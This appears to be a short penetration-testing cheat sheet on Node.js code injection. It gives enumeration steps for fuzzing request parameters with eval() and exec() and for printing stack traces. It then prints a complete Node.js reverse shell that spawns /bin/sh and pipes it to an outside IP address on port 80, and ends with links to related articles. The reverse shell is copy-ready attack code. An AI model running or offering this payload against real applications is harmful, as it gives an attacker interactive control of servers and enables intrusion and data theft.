Enumeration

• [ ] Identity exposed parameters that can be manipulated in the request
• [ ] Try fuzzing the parameters by passing different functions as exec(1+1), eval (1+2) and see if the application would execute the function and calculate the arithmetic operation.
• [ ] Try to print the stack error to get more information about the applicaiton

function stackTrace() {
var err = new Error();
print(err.stack);
}

Functions to test

• eval()

eval (3+3);

NodeJS Reverse Shell

• Encode the nodejs

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(80, "192.168.49.243", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})()%

Resources

[demo.paypal.com] Node.js code injection (RCE)

Preventing Command Injection Attacks in Node.js Apps

Everything Wrong With JavaScript eval()

Remote Code Execution (Node Security) | ShiftLeft

Eval In JavaScript As A Hacker's Dream

Escape NodeJS Sandboxes using interpreter internals

Reverse shell through a node.js math parser - Truesec

Executing Shell Commands with Node.js

OWASP NodeGoat Tutorial